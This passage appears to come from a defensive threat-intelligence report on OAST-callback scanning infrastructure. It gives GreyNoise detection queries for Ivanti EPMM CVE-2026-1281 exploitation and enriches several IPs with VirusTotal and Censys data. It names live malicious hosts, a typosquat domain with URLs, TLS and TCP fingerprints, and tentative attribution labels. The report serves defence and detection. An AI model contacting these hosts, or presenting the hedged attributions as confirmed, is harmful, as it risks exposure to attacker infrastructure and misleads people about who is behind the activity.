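Run `triage()` over each record in `SAMPLE_SESSIONS`: the first two alert (callback host plus a listed JA4T), the third does not, because a default Linux stack without a callback domain is not an indicator by itself.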

GNQL Queries

Sessions containing OAST callback domains in the past 7 days:

tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

PROSPERO OOO infrastructure (Ivanti EPMM exploitation):

metadata.asn:AS200593 last_seen:7d

Oracle Cloud scanning infrastructure:

metadata.asn:AS31898 last_seen:7d tags:"Contains Well-known Out-of-band Interaction Domain"

Shared JA3 cluster:

raw_data.ja3.fingerprint:11a384388ad36777e1a2e121495037fe last_seen:7d

CVE-2026-1281 exploitation:

tags:"Ivanti Endpoint Manager Mobile Code Injection CVE-2026-1281 RCE Attempt" last_seen:7d

AS215540 (new scanning infrastructure):

metadata.asn:AS215540 last_seen:7d

Supplemental Threat Intelligence Enrichment For Selected OAST Infrastructure

VirusTotal + Censys

This section layers external threat intelligence from Censys & VirusTotal onto key IPs from the OAST report.


193.24.123.42 (PROSPERO OOO, Russia) - Ivanti EPMM Attacker

VirusTotal Classification:

  • 14% malicious detection rate (13/93 engines)
  • Community reputation: 0 (neutral, no votes)
  • Self-signed certificate for www.vvork.com (Hestia Control Panel)
  • Certificate validity: 2025-07-08 to 2026-07-08
  • 2 downloaded files observed (HTML, index.html)

Censys Infrastructure:

  • BULLETPROOF hosting label (confidence: 0.75) – Censys classifies this as bulletproof infrastructure resistant to takedown
  • Location: St. Petersburg, Russia (59.9386°N, 30.3141°E)
  • Only 1 service exposed: Port 111 (PORTMAP/TCP)
  • Network creation: 2024-07-03 (recent allocation)
  • WHOIS: PROSPERO OOO, PR-CT SOLIDARITY, D. 12 K. 2 LITERA Z, KV. 167, 193312, ST. PETERSBURG
  • Abuse contact: mail@pro-spero.ru

Key Findings:

  • The bulletproof hosting label combined with exclusive CVE-2026-1281 exploitation suggests this is purpose-built attack infrastructure
  • Minimal exposed attack surface (only PORTMAP) indicates operational security awareness
  • Self-signed certificate and Hestia Control Panel suggest web hosting management interface
  • Network registered 6 months before OAST observation window

Detection Priority: CRITICAL – bulletproof infrastructure actively exploiting 2026 vulnerabilities


204.216.147.144 (Oracle Corporation, Brazil)

VirusTotal Classification:

  • 4.3% malicious detection rate (4/93 engines), 1.1% suspicious (1/93)
  • Community reputation: -1 (1 malicious vote)
  • Resolves to vamflix.ddns.net (dynamic DNS, suspicious)
  • 2 downloaded files: APK Easy Tool v1.60 Portable.zip, light-skin-3.png

Censys Infrastructure:

  • Oracle Cloud (AS31898), São Paulo, Brazil
  • No detailed Censys scan available (Oracle Cloud may block external scans)

Key Findings:

  • DDNS resolution (vamflix.ddns.net) indicates dynamic/residential IP rotation or home-hosted infrastructure on Oracle Cloud
  • Community malicious vote suggests prior abuse reports
  • 591 OAST sessions across 5 campaigns with broadest payload diversity
  • GreyNoise first observed 2024-09-10 (35,367 total hits, 8 sensors) – established scanning infrastructure

Detection Priority: HIGH – Oracle Cloud abuse, established malicious history


179.43.146.42 (Private Layer INC, Switzerland)

VirusTotal Classification:

  • 2.2% malicious detection rate (2/93)
  • Community reputation: -1 (1 malicious vote)
  • Certificate for dns.nullsproxy.com (Gandi CA)
  • 5 domain resolutions (all suspicious):
    • aliyundunupdate.xyz (last resolved 2026-02-08) – impersonates Alibaba Cloud security update domain
    • dns.nullsproxy.com
    • lonatersency.com (2015)
    • billerma.com (2015)
    • palablersdown.com (2015)
  • JARM hash: 2ad2ad0002ad2ad00042d42d0000005d86ccb1a0567e012264097a0315d7a7
  • URLs observed: http://aliyundunupdate.xyz:8084/slt, http://aliyundunupdate.xyz:8084/

Censys Infrastructure:

  • BULLETPROOF hosting label (confidence: 0.75)
  • Location: Bellinzona, Switzerland (registered country: Panama)
  • Reverse DNS: hostedby.privatelayer.com
  • OS: Debian Linux with OpenSSH 10.2p1
  • 4 exposed services:
    1. SSH (22): OpenSSH 10.2p1 Debian-3
    2. HTTP (8082): Basic auth protected (“Authorization Required”)
    3. HTTP (8084): nginx default welcome page – likely C2 or malware distribution
    4. HTTP (8089): Basic auth protected (“Restricted”)
  • JA4T fingerprint (Censys scan): 31856_2-4-8-1-3_1460_7 – standard Debian TCP stack
    • NOTE: Our OAST sessions showed JA4T 32120_2-4-8-1-3_1460_7 (window 32120) – this indicates the scanning tool uses a custom TCP stack modification, not the host’s default stack

Key Findings:

  • The aliyundunupdate.xyz domain is a typosquat impersonating Alibaba Cloud (legitimate: aliyundun.com)
  • Multiple historical suspicious domains suggest long-term malicious hosting
  • Nginx default page on port 8084 with no customization indicates rapid deployment
  • Unique TCP window size (32120) is a high-confidence fingerprint for tracking this actor across different IPs
  • Sustained 7-day scanning (Feb 7-13) with 456 sessions indicates automated, unattended operation
  • GreyNoise: 43,110 hits across 38 sensors since 2026-02-03

Detection Priority: HIGH – bulletproof infrastructure with C2 characteristics and typosquatting


46.29.235.157 (AS215540, Global Connectivity Solutions LLP)

VirusTotal Classification:

  • 1.1% malicious detection rate (1/93 engines)
  • 98.9% undetected (92/93)
  • No domain resolutions or SSL certificates in VirusTotal
  • Community reputation: 0

Censys Infrastructure:

  • Location: Amsterdam, Netherlands (NOT Denmark as initially reported)
  • Reverse DNS: 40735.ip-ptr.tech
  • OS: pfSense FreeBSD firewall/router
  • 1 exposed service:
    • HTTPS (443): pfSense web GUI login page
    • Self-signed certificate: “pfSense GUI default Self-Signed Certificate”
    • Certificate CN: pfSense-697f5f3d024f3
    • nginx frontend with PHP backend (PHPSESSID cookie)
    • favicon hash: 5567e9ce23e5549e0fcd7195f3882816 (pfSense default)
    • HTML title: “pfSense - Login”
  • JA4T fingerprint (Censys scan): 65228_2-1-3-4-8_1460_7
    • TCP options: 2-1-3-4-8 – non-standard ordering (default Linux: 2-4-8-1-3)
    • This matches one of our observed fingerprints (64240_2-1-3-1-1-4_1400_8) with similar non-standard option ordering
  • WHOIS created: 2023-05-10

Key Findings:

  • pfSense firewall suggests this is a router/VPN endpoint for scanning operations, not an end host
  • The self-signed pfSense certificate (default install) indicates minimal operational security
  • Non-standard TCP option ordering (2-1-3-4-8) is a VPN/tunnel artifact – likely WireGuard or similar
  • Our OAST sessions showed 3 distinct JA4T fingerprints from this IP:
    1. 64240_2-1-3-1-1-4_1400_8 (165 sessions) – primary tool through VPN
    2. 65495_2-4-8-1-3_65495_7 (69 sessions) – Nuclei
    3. 33280_2-4-8-1-3_65495_7 (25 sessions) – Nuclei variant
  • This indicates multi-tool deployment through multiple network paths (VPN + local)
  • Shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with Estonian (45.138.101.232) and Contabo (37.60.230.90) IPs
  • GreyNoise: 9,881 hits across 6 sensors since 2026-02-08 (brand new)

Detection Priority: MEDIUM – likely security researcher or bug bounty hunter using pfSense router for scanning


147.224.178.225 (Oracle Corporation, United States)

VirusTotal Classification:

  • Not queried individually (token conservation)
  • GreyNoise carries CVE-2026-1281 AND CVE-2026-0770 tags

Key Findings from Report:

  • Dual-tool deployment: Uses both standard Linux JA4T (132 sessions) AND Nuclei JA4T (233 sessions)
  • 365 sessions across 4 campaigns (3fk04, gt3fk, jfk04, rfk04)
  • Campaign ID pattern (*fk04) suggests sequential tool runs
  • GreyNoise: 23,109 hits across 10 sensors since 2026-02-01 (very recent)

Detection Priority: HIGH – dual exploitation tools, recent infrastructure, 2026 CVE tags


103.144.87.192 (Viet Storage, Vietnam)

Key Findings from Report:

  • Highest OAST domain-to-session ratio: 1,177 domains / 264 sessions = 4.46 domains per session
  • This indicates either:
    1. Multi-vector payload injection (same session hits multiple fields)
    2. Payload template reuse with rotating campaign IDs
  • Campaigns: p7a5r, 97a5r (both Feb 9-13)
  • JA4T: Mixed Nuclei fingerprints (MSS 65495, windows 65495 and 33280)

Detection Priority: MEDIUM – high-volume scanner, Log4j focus


Shared Infrastructure Patterns

JA3 Cluster (3 IPs, shared TLS library):

  1. 46.29.235.157 (AS215540, Netherlands/pfSense) - 3 JA4Ts
  2. 45.138.101.232 (AS41745, Estonia) - 1 JA4T: 64860..1380_7 (tunnel)
  3. 37.60.230.90 (AS51167, Contabo, France) - 1 JA4T: 64240..1460_7 (standard)

JA3 11a384388ad36777e1a2e121495037fe shared across all three, but divergent JA4T fingerprints indicate same application-layer tool deployed across different network configurations (pfSense VPN, tunnel MSS 1380, standard Linux).

Bulletproof Hosting Cluster:

  • 193.24.123.42 (PROSPERO, Russia) - CVE-2026-1281 exploitation
  • 179.43.146.42 (Private Layer, Switzerland) - C2 infrastructure, typosquatting

Both labeled BULLETPROOF by Censys (0.75 confidence), indicating takedown-resistant infrastructure.